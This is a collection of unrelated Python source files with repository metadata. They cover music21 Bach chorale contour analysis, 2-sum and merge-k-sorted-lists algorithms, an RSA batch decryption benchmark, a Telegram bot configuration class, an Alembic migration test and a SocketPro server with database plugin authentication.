        x, y = zip(*contList)
        self._aggContoursPoly[cType] = numpy.poly1d( numpy.polyfit(x, y, order))
        return self._aggContoursPoly[cType]

    def plot(self, cType, showPoints=True, comparisonContour=None, regression=True, order=6):
        '''Plot the aggregate contour of type cType: raw points (optional), an
        optional comparison contour dict, and the polynomial regression curve.'''
        #TODO: maybe have an option of specifying a different
        #    color thing for each individual contour...
        if cType not in self.aggContours: #['dissonance', 'tonality', 'distance']:
            return None
        else:
            contour = self.getCombinedContour(cType)
        #    elif cType not in self._aggContoursAsList:
        #        contour = self.getCombinedContour(cType)
        #    else:
        #        contour = self._aggContoursAsList[cType]
        #
        (plt, numpy) = _getExtendedModules() #@UnusedVariable
        x, y = zip(*contour)
        if showPoints:
            plt.plot(x, y, '.', label='contour', markersize=5)
        if comparisonContour is not None:
            x = comparisonContour.keys()
            y = [comparisonContour[i] for i in x]
            plt.plot(x, y, '.', label='compContour', markersize=8)
        #p = numpy.poly1d( numpy.polyfit(x, y, order))
        p = self.getCombinedContourPoly(cType)
        if regression:
            t = numpy.linspace(0, max(x), max(x) + 1)
            plt.plot(t, p(t), 'o-', label='estimate', markersize=1) #probably change label
        plt.xlabel('Time (percentage of piece)')
        plt.ylabel('Value') #change this
        plt.title('title') #say for which piece
        #plt.savefig(filename + '.png')
        plt.show()
        plt.clf()

    def dissimilarityScore(self, cType, contourDict):
        '''
        Returns a score based on how dissimilar the input contourDict is from
        the aggregate contour of type cType.
        Requires contourDict be normalized with values from 1.0 to 100.0
        '''
        # sum of absolute deviations from the aggregate's polynomial fit
        p = self.getCombinedContourPoly(cType)
        return sum( [abs(contourDict[x] - p(x)) for x in contourDict] )
_DOC_ORDER = [ContourFinder, AggregateContour]
def _getOutliers():
    '''
    Survey the Bach chorale corpus and return a dict mapping each chorale
    filename to its length in measures (after simplifying repeats and
    subtracting any pickup measure).  Chorales that are known to break
    analysis or are not in four parts are skipped.
    '''
    BCI = corpus.chorales.Iterator(returnType='filename')
    highestNum = BCI.highestNumber
    currentNum = BCI.currentNumber
    lengthDict = {}
    for chorale in BCI:
        print(currentNum)  # progress indicator
        # use != rather than "is not": identity comparison of ints is an
        # implementation detail and unreliable outside CPython's small-int cache
        if currentNum != highestNum:
            currentNum = BCI.currentNumber
        s = corpus.parse(chorale)
        if chorale == 'bach/bwv277':
            # this chorale has an extra measure container in the middle
            # which breaks the analysis (see note in _runExperiment)
            continue
        elif len(s.parts) != 4:
            continue
        rf = repeat.RepeatFinder(s)
        s = rf.simplify()
        # hasPickup() is a bool: True subtracts the pickup measure from the count
        lengthDict[chorale] = len(s.measureOffsetMap()) - rf.hasPickup()
    return lengthDict
def _runExperiment():
    '''
    For each pre-screened chorale, build aggregate dissonance/tonality/spacing
    contours, then check, per chorale and per contour type, whether the
    chorale's own contour is closer to the aggregate than random shufflings
    of itself usually are (100 shuffles; "success" = closer more than half
    the time).
    '''
    #get chorale iterator, initialize ac
    ac = AggregateContour()
    #unresolved problem numbers: 88 (repeatFinder fails!)
    # chorales that survived the screening in _getOutliers (four parts,
    # reasonable length, no known analysis breakers)
    goodChorales = ['bach/bwv330', 'bach/bwv245.22', 'bach/bwv431',
                    'bach/bwv324', 'bach/bwv384', 'bach/bwv379', 'bach/bwv365',
                    'bach/bwv298', 'bach/bwv351', 'bach/bwv341', 'bach/bwv421',
                    'bach/bwv420', 'bach/bwv331', 'bach/bwv84.5', 'bach/bwv253',
                    'bach/bwv434', 'bach/bwv26.6', 'bach/bwv64.2', 'bach/bwv313',
                    'bach/bwv314', 'bach/bwv166.6', 'bach/bwv414', 'bach/bwv264',
                    'bach/bwv179.6', 'bach/bwv67.7', 'bach/bwv273', 'bach/bwv373',
                    'bach/bwv376', 'bach/bwv375', 'bach/bwv151.5', 'bach/bwv47.5',
                    'bach/bwv197.10', 'bach/bwv48.3', 'bach/bwv88.7', 'bach/bwv310',
                    'bach/bwv244.46', 'bach/bwv153.1', 'bach/bwv69.6', 'bach/bwv333',
                    'bach/bwv104.6', 'bach/bwv338', 'bach/bwv155.5', 'bach/bwv345',
                    'bach/bwv435', 'bach/bwv323', 'bach/bwv245.3', 'bach/bwv144.3', 'bach/bwv405',
                    'bach/bwv406', 'bach/bwv316', 'bach/bwv258', 'bach/bwv254',
                    'bach/bwv256', 'bach/bwv257', 'bach/bwv69.6-a', 'bach/bwv86.6',
                    'bach/bwv388', 'bach/bwv308', 'bach/bwv307', 'bach/bwv244.32',
                    'bach/bwv268', 'bach/bwv260', 'bach/bwv110.7', 'bach/bwv40.3',
                    'bach/bwv164.6', 'bach/bwv9.7', 'bach/bwv114.7', 'bach/bwv364',
                    'bach/bwv291', 'bach/bwv245.17', 'bach/bwv297', 'bach/bwv20.11',
                    'bach/bwv319', 'bach/bwv244.3', 'bach/bwv248.35-3', 'bach/bwv96.6',
                    'bach/bwv48.7', 'bach/bwv337', 'bach/bwv334', 'bach/bwv101.7',
                    'bach/bwv168.6', 'bach/bwv55.5', 'bach/bwv154.3', 'bach/bwv89.6',
                    'bach/bwv2.6', 'bach/bwv392', 'bach/bwv395', 'bach/bwv401', 'bach/bwv408',
                    'bach/bwv259', 'bach/bwv382', 'bach/bwv244.37', 'bach/bwv127.5',
                    'bach/bwv44.7', 'bach/bwv303', 'bach/bwv263', 'bach/bwv262',
                    'bach/bwv248.46-5', 'bach/bwv13.6', 'bach/bwv377', 'bach/bwv416',
                    'bach/bwv354', 'bach/bwv244.10', 'bach/bwv288', 'bach/bwv285',
                    'bach/bwv113.8', 'bach/bwv393', 'bach/bwv360', 'bach/bwv363',
                    'bach/bwv367', 'bach/bwv90.5', 'bach/bwv245.11', 'bach/bwv5.7',
                    'bach/bwv289', 'bach/bwv83.5', 'bach/bwv359', 'bach/bwv352',
                    'bach/bwv102.7', 'bach/bwv394', 'bach/bwv227.11', 'bach/bwv244.40',
                    'bach/bwv244.44', 'bach/bwv424', 'bach/bwv244.25', 'bach/bwv80.8',
                    'bach/bwv244.54', 'bach/bwv78.7', 'bach/bwv57.8', 'bach/bwv194.6',
                    'bach/bwv397', 'bach/bwv64.8', 'bach/bwv318', 'bach/bwv315',
                    'bach/bwv153.5', 'bach/bwv39.7', 'bach/bwv108.6', 'bach/bwv386',
                    'bach/bwv25.6', 'bach/bwv417', 'bach/bwv415', 'bach/bwv302',
                    'bach/bwv380', 'bach/bwv74.8', 'bach/bwv422', 'bach/bwv133.6',
                    'bach/bwv270', 'bach/bwv272', 'bach/bwv38.6', 'bach/bwv271', 'bach/bwv183.5',
                    'bach/bwv103.6', 'bach/bwv287', 'bach/bwv32.6', 'bach/bwv245.26',
                    'bach/bwv248.5', 'bach/bwv411', 'bach/bwv369', 'bach/bwv339',
                    'bach/bwv361', 'bach/bwv399', 'bach/bwv16.6', 'bach/bwv419',
                    'bach/bwv87.7', 'bach/bwv4.8', 'bach/bwv358', 'bach/bwv154.8',
                    'bach/bwv278', 'bach/bwv156.6', 'bach/bwv248.33-3', 'bach/bwv81.7',
                    'bach/bwv227.7', 'bach/bwv427', 'bach/bwv77.6', 'bach/bwv410',
                    'bach/bwv329', 'bach/bwv85.6', 'bach/bwv385', 'bach/bwv309',
                    'bach/bwv305', 'bach/bwv18.5-l', 'bach/bwv18.5-w', 'bach/bwv197.5',
                    'bach/bwv30.6', 'bach/bwv296', 'bach/bwv292', 'bach/bwv353',
                    'bach/bwv301', 'bach/bwv347',
                    'bach/bwv284', 'bach/bwv429', 'bach/bwv436', 'bach/bwv430',
                    'bach/bwv381', 'bach/bwv36.4-2', 'bach/bwv412', 'bach/bwv65.7', 'bach/bwv280',
                    'bach/bwv169.7', 'bach/bwv428', 'bach/bwv346', 'bach/bwv248.12-2',
                    'bach/bwv426',
                    'bach/bwv159.5', 'bach/bwv121.6', 'bach/bwv418', 'bach/bwv28.6',
                    'bach/bwv326', 'bach/bwv327', 'bach/bwv321', 'bach/bwv65.2',
                    'bach/bwv144.6', 'bach/bwv194.12', 'bach/bwv398', 'bach/bwv317',
                    'bach/bwv153.9', 'bach/bwv300', 'bach/bwv56.5', 'bach/bwv423',
                    'bach/bwv306', 'bach/bwv40.6', 'bach/bwv123.6', 'bach/bwv245.28',
                    'bach/bwv279', 'bach/bwv378', 'bach/bwv366', 'bach/bwv45.7', 'bach/bwv295',
                    'bach/bwv245.14', 'bach/bwv122.6', 'bach/bwv355', 'bach/bwv357',
                    'bach/bwv94.8', 'bach/bwv348', 'bach/bwv349', 'bach/bwv312',
                    'bach/bwv325', 'bach/bwv245.37', 'bach/bwv37.6', 'bach/bwv283',
                    'bach/bwv299', 'bach/bwv294', 'bach/bwv245.15', 'bach/bwv176.6',
                    'bach/bwv391', 'bach/bwv350', 'bach/bwv400', 'bach/bwv372',
                    'bach/bwv402', 'bach/bwv282', 'bach/bwv374', 'bach/bwv60.5',
                    'bach/bwv356', 'bach/bwv389', 'bach/bwv40.8', 'bach/bwv174.5',
                    'bach/bwv340', 'bach/bwv433', 'bach/bwv322', 'bach/bwv403',
                    'bach/bwv267', 'bach/bwv261', 'bach/bwv245.40', 'bach/bwv33.6',
                    'bach/bwv269', 'bach/bwv266', 'bach/bwv43.11', 'bach/bwv10.7',
                    'bach/bwv343', 'bach/bwv311']
    currentNum = 1
    #BCI = corpus.chorales.Iterator(1, 371, returnType='filename') #highest number is 371
    #highestNum = BCI.highestNumber
    #currentNum = BCI.currentNumber
    # phase 1: accumulate every chorale's normalized contours into ac
    for chorale in goodChorales:
        print(currentNum)  # progress indicator
        currentNum +=1
        # '''
        # if chorale == 'bach/bwv277':
        #     continue #this chorale here has an added measure
        #     # container randomly in the middle which breaks things.
        # '''
        chorale = corpus.parse(chorale)
        # '''
        # if len(chorale.parts) is not 4:
        #     print("chorale had too many parts")
        #     continue
        # '''
        chorale = repeat.RepeatFinder(chorale).simplify()
        # '''
        # length = len( chorale.measureOffsetMap() )
        # if length < 10:
        #     print("too short")
        #     continue
        # elif length > 25:
        #     print("too long")
        #     continue
        # '''
        cf= ContourFinder(chorale)
        ac.addPieceToContour(cf, 'dissonance')
        ac.addPieceToContour(cf, 'tonality')
        ac.addPieceToContour(cf, 'spacing')
    print(ac.aggContours['dissonance'])
    print(ac.aggContours['tonality'])
    print(ac.aggContours['spacing'])
    # phase 2: for each contour type, compare each chorale's dissimilarity
    # to the aggregate against 100 randomized shufflings of the same contour
    for cType in ['spacing', 'tonality', 'dissonance']:
        print("considering", cType, ": ")
        cf = ContourFinder()  # only used for its randomize() helper
        totalSuccesses = 0
        totalFailures = 0
        for j in range( len(ac.aggContours[cType])):
            contDict = ac.aggContours[cType][j]
            observed = ac.dissimilarityScore(cType, contDict)
            successes = 0
            for i in range(100):
                randomized = ac.dissimilarityScore( cType, cf.randomize(contDict) )
                if randomized > observed:
                    successes += 1
            # success = the real contour beat the shuffles more than half the time
            if successes > 50:
                totalSuccesses += 1
                #print "GREAT SUCCESS!"
            else:
                totalFailures += 1
                print("failure: chorale " + goodChorales[j]) #index ", str(i)
        print(cType, ": totalSuccesses =", str(totalSuccesses),
              "totalFailures =", str(totalFailures))
def _plotChoraleContours():
    '''
    Save a tonality-contour plot for each of the first 75 Bach chorales;
    on the first failure, print and display the offending chorale, then stop.
    '''
    BCI = corpus.chorales.Iterator(1, 75, returnType='filename')
    for chorale in BCI:
        s = corpus.parse(chorale)
        cf = ContourFinder(s)
        chorale = chorale[5:]  # strip the leading 'bach/' from the filename
        print(chorale)
        #cf.plot('dissonance', fileName= chorale + 'dissonance', regression=False)
        try:
            cf.plot('tonality', fileName= chorale + 'tonality', regression=False)
        except exceptions21.Music21Exception:
            # show the chorale that could not be analyzed, then give up
            print(chorale)
            s.show()
            break
    pass
#------------------------
class Test(unittest.TestCase):
    # placeholder test case so music21's test runner can exercise this module
    def runTest(self):
        pass
if __name__ == "__main__":
    import music21
    # run this module's doctests and Test cases through music21's test runner
    music21.mainTest(Test, 'moduleRelative')
| cuthbertLab/music21-tools | contour/contour.py | contour.py | py | 30,165 | python | en | code | 37 | github-code | 36 | [
{
"api_name": "music21.environment.Environment",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "music21.environment",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "music21.exceptions21.Music21Exception",
"line_number": 14,
"usage_type": "attribute"
... |
39086540253 | import logging
import sys
def two_sum_sorting(numbers_set, range_start, range_end):
    """Count distinct targets t in [range_start, range_end] (inclusive) for
    which two distinct numbers x, y in numbers_set satisfy x + y == t.

    Sort once, then sweep with two pointers.  Whenever the pointer sum lands
    inside the range, also collect the sums of the high element with every
    element between the pointers; the list is sorted, so we can stop at the
    first sum that falls outside the range.
    """
    # module logger: the original relied on a global `logger` created only
    # under __main__, which raised NameError when this module was imported
    logger = logging.getLogger(__name__)
    logger.info('Started function that uses sorting')
    numbers_sorted = sorted(numbers_set)
    logger.info('Done sorting')
    start = 0
    end = len(numbers_sorted) - 1
    result = set()
    logger.info('Entering main while loop')
    while start < end:
        tmp = numbers_sorted[start] + numbers_sorted[end]
        if tmp > range_end:
            end -= 1
        elif tmp < range_start:
            start += 1
        else:
            result.add(tmp)
            for i in range(start + 1, end):
                t = numbers_sorted[i] + numbers_sorted[end]
                # inclusive bounds, matching the outer checks above; the old
                # helper used strict bounds and dropped boundary targets
                if range_start <= t <= range_end:
                    result.add(t)
                else:
                    break
            end -= 1
    logger.info('Done looping')  # approx 1.6s
    return len(result)
def two_sum_hash(numbers_set, range_start, range_end):
    """Count distinct targets t in [range_start, range_end] (inclusive)
    expressible as x + y with x, y distinct members of numbers_set.

    Brute force over every target with O(1) set lookups; O(range * n) overall.
    """
    # module logger: the original relied on a global `logger` created only
    # under __main__, which raised NameError when this module was imported
    logger = logging.getLogger(__name__)
    logger.info('Started function that uses set lookup')
    result = set()
    # + 1 so the upper bound is inclusive, matching two_sum_sorting
    for i in range(range_start, range_end + 1):
        for n in numbers_set:
            # i - n != n forbids using the same element twice
            if i - n in numbers_set and i - n != n:
                result.add(i)
                break  # one witness pair is enough for this target
    logger.info('Finished set lookup')  # more than 60min on the full input
    return len(result)
def check_in_range(number, range_start, range_end):
    """Return True if range_start <= number <= range_end (inclusive bounds).

    Bounds are inclusive so that boundary targets (e.g. exactly +/-10000 in
    the main program's range) are counted, matching the inclusive comparison
    in two_sum_sorting's outer loop; the old strict bounds dropped them.
    """
    return range_start <= number <= range_end
if __name__ == '__main__':
    # initialize logging to console
    logger = logging.getLogger()
    logger.setLevel(logging.INFO)
    ch = logging.StreamHandler(sys.stdout)
    ch.setLevel(logging.INFO)
    formatter = logging.Formatter('%(asctime)s.%(msecs)03d %(name)s %(levelname)s %(message)s')
    ch.setFormatter(formatter)
    logger.addHandler(ch)
    # actual start
    logger.info('Program started')
    nums = set()
    # load data: one integer per line; the set deduplicates repeated numbers
    with open('algo1-programming_prob-2sum.txt') as data:
        for line in data:
            raw = line.strip()
            if raw:
                i = int(raw)
                nums.add(i)
    logger.info('Data loaded from file')
    # count distinct two-sum targets in [-10000, 10000]
    print(two_sum_sorting(nums, -10000, 10000))
    # print(two_sum_hash(nums, -10000, 10000))
    logger.info('Program end')
| nickslavsky/Algorithms-pt1 | Week 6/2sum.py | 2sum.py | py | 2,209 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "logging.StreamHandler",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "sys.stdout"... |
4255371054 | from typing import List
from data_structures.list_node import ListNode
from heapq import *
class Solution:
    def mergeKLists(self, lists: List[ListNode]) -> ListNode:
        """Merge k sorted linked lists into one sorted list of new nodes.

        Keep a min-heap of (value, list_index, node) holding the current
        front of each non-empty input list; repeatedly pop the smallest and
        push its successor.  The list index breaks value ties so nodes are
        never compared directly.  O(N log k) for N total nodes.

        Returns None when every input list is empty.
        """
        min_heap = []
        for i, node in enumerate(lists):
            if node:
                heappush(min_heap, (node.val, i, node))
        # dummy head removes the first-node special case; the original built
        # a momentary self-loop (head.next = tail) that was immediately
        # overwritten, which obscured the intent
        dummy = ListNode(0)
        tail = dummy
        while min_heap:
            val, i, node = heappop(min_heap)
            if node.next:
                heappush(min_heap, (node.next.val, i, node.next))
            tail.next = ListNode(val)
            tail = tail.next
        return dummy.next
| blhwong/algos_py | leet/merge_k_sorted_lists/main.py | main.py | py | 844 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "data_structures.list_node.ListNode",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "data_structures.list_node.ListNode",
"line_number": 21,
"usage_type": "call"
},
{
"a... |
34463656888 | import mainBMRSA as Bmrsa
import mainBRSA as Brsa
import matplotlib.pyplot as plt
from useful import funcs
# number of bs
bsize = 1
# benchmark batch sizes 1..3: for each, time plain batched RSA decryption
# versus BMRSA across growing key sizes, then plot both curves
while bsize < 4:
    # Start from prime size = 10 bits
    # mrsa and bmrsa time
    itr = 10
    mrsa = []
    bmrsa = []
    # points needed to be marked on graph
    pts = [1024]
    # go till 18 bits
    # No of bits in key = 2 ** (n/b) * b
    while itr <= 18:
        n = itr
        b = 2
        ll = bsize
        primes = funcs.generate_primes(n, b)
        # modulus n becomes the product of the generated primes
        n = 1
        for p in primes:
            n *= p
        m = funcs.generate_message(ll, n)
        es = funcs.es(primes, ll)
        timeBRSA = 0
        # Get time for each BRSA
        for i in range(ll):
            timeBRSA += Brsa.main(primes, es[i], m[i])
        # Time in milliseconds
        mrsa.append(timeBRSA * 1000)
        # Get time for BMRSA
        timeBMRSA = Bmrsa.main(primes, es, m)
        # Time in milli seconds
        bmrsa.append(timeBMRSA*1000)
        # NOTE(review): pts is reassigned to this same fixed list on every
        # iteration, making the initial [1024] above dead -- confirm these
        # x-axis values actually match the generated key sizes
        pts = [1024, 1536, 2048, 2560, 3072]
        itr += 2
    # Plotting graphs
    fig, ax = plt.subplots()
    # plot subplots
    ax.plot(pts, mrsa, "ro-", label="BatchRSA")
    ax.plot(pts, bmrsa, "bo-", label="BMRSA")
    # legends in graph
    legend = ax.legend(loc='upper center', shadow=True, fontsize='x-large')
    # title
    plt.title("Decryption time vs Key Size in bits for batch size = " + str(bsize))
    plt.ylabel('Time in milliseconds')
    plt.xlabel('No of Bits in key')
    # display graph
    plt.show()
    # increase byte size
    bsize += 1
| SUMUKHA-PK/RSA-efficient-variants | src/BMRSA/main.py | main.py | py | 1,574 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "useful.funcs.generate_primes",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "useful.funcs",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "useful.funcs.generate_message",
"line_number": 38,
"usage_type": "call"
},
{
"api_name"... |
4502539107 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import sys
import os
from service.singleton import Singleton
class Config(Singleton):
    """Singleton holding the bot's runtime configuration parsed from the CLI.

    Exposes: args (the parsed Namespace), port, token, base_dir (project
    root), db_filename (sqlite file under base_dir) and url_prefix.
    Prints help and exits with status 1 when the argument combination is
    invalid.
    """
    def __init__(self):
        parser = self.__get_parser()
        self.args = parser.parse_args()
        self.port = self.args.port
        self.token = self.args.token
        # project root = parent of the directory containing this file
        self.base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
        self.db_filename = os.path.join(self.base_dir, 'verify_bot.db')
        self.url_prefix = self.args.url_prefix
        if not self.__check_args():
            parser.print_help()
            sys.exit(1)

    def __get_parser(self):
        """Build the ArgumentParser describing all supported CLI options.

        (Renamed from the misspelled __get_praser; only used internally.)
        """
        parser = argparse.ArgumentParser(description='VerifyBot')
        parser.add_argument('-t', '--token', help='Telegram Bot token.')
        parser.add_argument('-p', '--port', help='Port to listen.')
        parser.add_argument('-d', '--demon', help='Run as demon.', action='store_true')
        parser.add_argument('--url-prefix', help='Working url prefix. e.g. "/verifybot"', default='')
        parser.add_argument('--set-web-hook', help='Set web hook.', action='store_true')
        parser.add_argument('--hostname', help='WebHook hostname.')
        parser.add_argument('-v', '--verbose', action='store_true', dest='verbose',
                            help='Enable debug info')
        return parser

    def __check_args(self):
        """Validate argument combinations; False triggers help + exit(1)."""
        if len(sys.argv) == 1:
            # invoked with no arguments at all: nothing to do
            return False
        if self.args.demon:
            # daemon mode needs both a listening port and a bot token
            if not self.args.port or not self.args.token:
                return False
        if self.args.set_web_hook:
            # registering a web hook needs the token and a public hostname
            if not self.args.token or not self.args.hostname:
                return False
        return True
| comzyh/VerifyBot | service/config.py | config.py | py | 1,711 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "service.singleton.Singleton",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "os.path.dirname",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "os.path.absp... |
10741283794 | from __future__ import unicode_literals
import os
import unittest
import tempfile
import textwrap
import decimal
import shutil
import transaction as db_transaction
class TestAlembic(unittest.TestCase):
    def setUp(self):
        # heavy third-party imports kept local to the test setup
        from sqlalchemy import create_engine
        from sqlalchemy.orm import scoped_session
        from sqlalchemy.orm import sessionmaker
        from sqlalchemy.ext.declarative import declarative_base
        from zope.sqlalchemy import ZopeTransactionExtension
        from alembic.config import Config
        self.temp_dir = tempfile.mkdtemp()
        # init database
        default_sqlite_url = 'sqlite:///{}/billy.sqlite'.format(self.temp_dir)
        self.db_url = os.environ.get(
            'BILLY_FUNC_TEST_DB',
            default_sqlite_url,
        )
        # as these tests cannot work with in-memory sqlite, so, when it is
        # a sqlite URL, we use the one in temp folder anyway
        if self.db_url.startswith('sqlite:'):
            self.db_url = default_sqlite_url
        self.engine = create_engine(self.db_url, convert_unicode=True)
        self.declarative_base = declarative_base()
        self.declarative_base.metadata.bind = self.engine
        # Zope-managed session so the `transaction` package controls commits
        self.session = scoped_session(sessionmaker(
            autocommit=False,
            autoflush=False,
            bind=self.engine,
            extension=ZopeTransactionExtension()
        ))
        # write a minimal alembic.ini pointing at the temp database
        self.alembic_path = os.path.join(self.temp_dir, 'alembic.ini')
        with open(self.alembic_path, 'wt') as f:
            f.write(textwrap.dedent("""\
            [alembic]
            script_location = alembic
            sqlalchemy.url = {}
            [loggers]
            keys = root
            [handlers]
            keys =
            [formatters]
            keys =
            [logger_root]
            level = WARN
            qualname =
            handlers =
            """).format(self.db_url))
        self.alembic_cfg = Config(self.alembic_path)
def tearDown(self):
# drop all tables
self.session.remove()
self.declarative_base.metadata.drop_all()
shutil.rmtree(self.temp_dir)
def test_use_integer_column_for_amount(self):
from sqlalchemy import Column
from sqlalchemy import Integer
from sqlalchemy import Numeric
class Plan(self.declarative_base):
__tablename__ = 'plan'
guid = Column(Integer, primary_key=True)
amount = Column(Numeric(10, 2))
class Subscription(self.declarative_base):
__tablename__ = 'subscription'
guid = Column(Integer, primary_key=True)
amount = Column(Numeric(10, 2))
class Transaction(self.declarative_base):
__tablename__ = 'transaction'
guid = Column(Integer, primary_key=True)
amount = Column(Numeric(10, 2))
self.declarative_base.metadata.create_all()
with db_transaction.manager:
for amount in ['12.34', '55.66', '10']:
amount = decimal.Decimal(amount)
plan = Plan(amount=amount)
subscription = Subscription(amount=amount)
transaction = Transaction(amount=amount)
self.session.add(plan)
self.session.add(subscription)
self.session.add(transaction)
from alembic import command
command.stamp(self.alembic_cfg, 'base')
command.upgrade(self.alembic_cfg, 'b3d4192b123')
# Notice: this with statement here makes sure the database transaction
# will be closed after querying, otherwise, we have two connections
# to postgresql (one by testing code, one by Alembic), when we are
# doing following downgrade, there is table alter, it appears
# there will be a deadlock when there is a overlap of two transaction
# scope
with db_transaction.manager:
for table in [Plan, Subscription, Transaction]:
amounts = self.session.query(table.amount).all()
amounts = map(lambda item: float(item[0]), amounts)
# make sure all float dollars are converted into integer cents
self.assertEqual(set(amounts), set([1234, 5566, 1000]))
command.downgrade(self.alembic_cfg, 'base')
with db_transaction.manager:
for table in [Plan, Subscription, Transaction]:
amounts = self.session.query(table.amount).all()
amounts = map(lambda item: item[0], amounts)
self.assertEqual(
set(amounts),
set(map(decimal.Decimal, ['12.34', '55.66', '10']))
)
| vdt/billy | billy/tests/functional/test_alembic.py | test_alembic.py | py | 4,718 | python | en | code | null | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "tempfile.mkdtemp",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.environ.get",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.environ",
... |
23080854641 | from consts import piConst, hwConst
from spa.serverside import CSocketProServer, CSocketProService,\
CClientPeer, BaseServiceID, Plugin
from spa.clientside import CAsyncQueue, CStreamingFile, CMysql, COdbc, CSqlite, CSqlServer, CPostgres
from spa.udb import DB_CONSTS
from pub_sub.ps_server.hwpeer import CHelloWorldPeer
from webdemo.myhttppeer import CMyHttpPeer
import sys
from ctypes import *
from sys import platform as os
# bool U_MODULE_OPENED WINAPI SetSPluginGlobalOptions(const char *jsonUtf8Options);
# int U_MODULE_OPENED WINAPI DoSPluginAuthentication(SPA::UINT64 hSocket,
#   const wchar_t *userId, const wchar_t *password, unsigned int nSvsId,
#   const wchar_t *options);

# Shared prototype for every plugin's DoSPluginAuthentication export.
_AUTH_ARGTYPES = [c_uint64, c_wchar_p, c_wchar_p, c_uint, c_wchar_p]


def _load_plugin(win_name, posix_name):
    """Load a SocketPro plugin shared library for the current platform.

    Bug fix: the original called ctypes.WinDLL unconditionally, but WinDLL
    only exists on Windows; on POSIX systems the library must be opened with
    CDLL (cdecl), otherwise the module raises NameError at import time.
    Note: ``os`` here is ``sys.platform`` (aliased at the top of the file).
    """
    if os == "win32":
        return WinDLL(win_name)
    return CDLL(posix_name)


def _bind_auth(lib):
    """Bind and type the DoSPluginAuthentication(...) -> int export of *lib*."""
    auth = lib.DoSPluginAuthentication
    auth.argtypes = _AUTH_ARGTYPES
    auth.restype = c_int
    return auth


# SQLite plugin also exposes SetSPluginGlobalOptions for JSON configuration.
sqlite_lib = _load_plugin("ssqlite.dll", "libssqlite.so")
SetSPluginGlobalOptions = sqlite_lib.SetSPluginGlobalOptions
SetSPluginGlobalOptions.argtypes = [c_char_p]
SetSPluginGlobalOptions.restype = c_bool
SQLite_Auth = _bind_auth(sqlite_lib)

mysql_lib = _load_plugin("smysql.dll", "libsmysql.so")
MySQL_Auth = _bind_auth(mysql_lib) if mysql_lib else None

odbc_lib = _load_plugin("sodbc.dll", "libsodbc.so")
ODBC_Auth = _bind_auth(odbc_lib) if odbc_lib else None

mssql_lib = _load_plugin("usqlsvr.dll", "libusqlsvr.so")
MsSql_Auth = _bind_auth(mssql_lib)

postgres_lib = _load_plugin("spostgres.dll", "libspostgres.so")
Postgres_Auth = _bind_auth(postgres_lib) if postgres_lib else None
with CSocketProServer() as server:
def OnClose(hSocket, errCode):
    """Socket-closed callback: locate the owning service and its peer.

    Currently only performs the lookup; per-peer cleanup is left as a stub.
    """
    bs = CSocketProService.SeekService(hSocket)
    if bs:
        sp = bs.Seek(hSocket)
        # ......
server.OnClose = OnClose
def OnIsPermitted(hSocket, userId, pwd, svsId):
    """Per-connection authentication hook.

    Known non-DB services are permitted without authentication; DB services
    delegate to their plugin's DoSPluginAuthentication.  Returns True
    (connection permitted) when the result is AUTHENTICATION_OK or better.
    """
    auth_res = Plugin.AUTHENTICATION_NOT_IMPLEMENTED
    if svsId == hwConst.sidHelloWorld or svsId == BaseServiceID.sidHTTP or svsId == piConst.sidPi or svsId == piConst.sidPiWorker:
        # give permission to known services without authentication
        auth_res = Plugin.AUTHENTICATION_OK
    elif svsId == CAsyncQueue.sidQueue or svsId == CStreamingFile.sidFile:
        # give permission to known services without authentication
        auth_res = Plugin.AUTHENTICATION_OK
    elif svsId == CPostgres.sidPostgres:
        auth_res = Postgres_Auth(hSocket, userId, pwd, svsId, 'server=localhost;timeout=45;max_SQLs_batched=16')
    elif svsId == CSqlServer.sidMsSql:
        auth_res = MsSql_Auth(hSocket, userId, pwd, svsId, 'server=localhost;timeout=45;max_SQLs_batched=16')
    elif svsId == COdbc.sidOdbc:
        auth_res = ODBC_Auth(hSocket, userId, pwd, svsId, 'DRIVER={ODBC Driver 13 for SQL Server};Server=windesk;database=sakila;max_sqls_batched=16')
    elif svsId == CMysql.sidMysql:
        auth_res = MySQL_Auth(hSocket, userId, pwd, svsId, 'server=windesk;max_sqls_batched=16')
    elif svsId == CSqlite.sidSqlite:
        auth_res = SQLite_Auth(hSocket, userId, pwd, svsId, 'usqlite.db')
    # PROCESSED (handle opened, no auth implemented) is deliberately promoted
    # to OK here, i.e. such connections are allowed through.
    if auth_res == Plugin.AUTHENTICATION_PROCESSED:
        # give permission without authentication
        auth_res = Plugin.AUTHENTICATION_OK
    if auth_res >= Plugin.AUTHENTICATION_OK:
        print(userId + "'s connecting permitted, and DB handle opened and cached")
    elif auth_res == Plugin.AUTHENTICATION_PROCESSED:
        # NOTE(review): unreachable -- PROCESSED was already promoted to OK above.
        print(userId + "'s connecting denied: no authentication implemented but DB handle opened and cached")
    elif auth_res == Plugin.AUTHENTICATION_FAILED:
        print(userId + "'s connecting denied: bad password or user id")
    elif auth_res == Plugin.AUTHENTICATION_INTERNAL_ERROR:
        print(userId + "'s connecting denied: plugin internal error")
    elif auth_res == Plugin.AUTHENTICATION_NOT_IMPLEMENTED:
        print(userId + "'s connecting denied: no authentication implemented")
    else:
        print(userId + "'s connecting denied: unknown reseaon with res --" + str(auth_res))
    return auth_res >= Plugin.AUTHENTICATION_OK
server.OnIsPermitted = OnIsPermitted
def do_configuration():
    """Pre-listen setup: register the pub/sub chat groups the demo uses."""
